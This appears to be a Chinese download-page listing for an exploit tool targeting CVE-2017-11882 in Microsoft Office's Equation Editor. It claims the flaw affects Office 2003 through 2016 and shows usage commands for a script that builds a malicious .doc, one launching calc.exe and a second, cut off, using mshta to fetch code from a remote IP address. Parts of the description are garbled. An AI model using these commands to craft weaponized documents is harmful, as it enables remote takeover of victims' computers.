上传者: 42117340
|
上传时间: 2021-12-02 16:42:31
|
文件大小: 433KB
|
文件类型: -
CVE-2017-11882概述
从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有外壳后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
用法
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
点击生成的“ test.doc”,顺利投放计算机工具。
python Command_CVE-2017-11882.py -c "mshta http://192.